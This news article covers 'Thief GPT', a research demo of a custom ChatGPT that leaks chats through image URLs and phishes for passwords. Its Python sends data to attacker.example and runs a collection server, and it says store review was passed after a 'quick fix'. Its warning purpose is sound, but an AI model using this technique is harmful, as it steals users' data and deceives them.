Malicious ChatGPT Agents May Steal Chat Messages and Data


In November 2023, OpenAI publicly released GPTs, letting anyone create customized versions of ChatGPT. Many custom GPTs have since been built for a wide range of purposes. On the other hand, threat actors can use the same feature to build their own GPTs that perform malicious activities.

Researchers have developed a new GPT to demonstrate how easily cybercriminals could steal user information, such as chat messages and passwords, or generate malicious code through crafted chat requests.

Thief GPT

This new malicious ChatGPT agent was created to forward users’ chat messages to a third-party server and to ask the user for sensitive information such as usernames and passwords.

Thief GPT (Source: Embracethered)

This is possible because ChatGPT loads images from any website, and fetching an image sends the request, along with any data embedded in the URL, to the third-party server hosting it. Moreover, a GPT can also contain instructions to ask the user for information and can send it anywhere, depending on how the GPT is configured.
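To illustrate the technique, here is a minimal sketch of how such an exfiltration payload could be constructed. The domain attacker.example, the /log path, and the data parameter are hypothetical placeholders, not details from the researchers’ report; the point is simply that whatever text is URL-encoded into the image address reaches the attacker’s server the moment the image is rendered.

```python
# Minimal sketch of the image-based exfiltration technique described above.
# A malicious GPT's instructions tell the model to append a markdown image
# to its replies; when ChatGPT renders the image, the captured chat text
# travels to the attacker's server inside the URL.
# attacker.example, /log, and the "data" parameter are hypothetical.
from urllib.parse import quote

def exfil_image_markdown(chat_message: str) -> str:
    # URL-encode the captured text so it survives as a query parameter
    payload = quote(chat_message)
    return f"![ ](https://attacker.example/log?data={payload})"

print(exfil_image_markdown("my password is hunter2"))
# ![ ](https://attacker.example/log?data=my%20password%20is%20hunter2)
```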

The demo GPT, named Thief GPT, was capable of asking the user questions and secretly forwarding the answers to a third-party server.
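On the receiving end, an attacker needs nothing more than a web server that records incoming requests. The following sketch, assuming the hypothetical /log?data=... URL format from the snippet above, logs the captured text and answers with a 1x1 GIF so the image appears to load normally.

```python
# Minimal sketch of the attacker-side collection server, assuming the
# hypothetical /log?data=... URL format from the previous snippet.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

# Smallest valid transparent GIF, returned so the image request succeeds
ONE_PIXEL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00"
                 b"\xff\xff\xff!\xf9\x04\x01\x00\x00\x00\x00,"
                 b"\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

class LogHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Pull the exfiltrated text out of the query string and log it
        query = parse_qs(urlparse(self.path).query)
        print("captured:", query.get("data", [""])[0])
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()
        self.wfile.write(ONE_PIXEL_GIF)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), LogHandler).serve_forever()
```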

However, publishing it was not straightforward. According to the documentation, ChatGPT offers creators three publishing options: Only me (the default), Anyone with a link, and Public. Because the researchers’ GPT used the words “Steal” and “malicious,” it violated the “brand and usage” guidelines and was initially rejected.

Rejected Guidelines (Source: Embracethered)

After a quick fix, however, the GPT was accepted into the GPT Store. This led to the conclusion that malicious actors could abuse the publicly available GPTs feature for malicious purposes.

Furthermore, a complete report has been published that provides details about the method, its usage, and other findings.


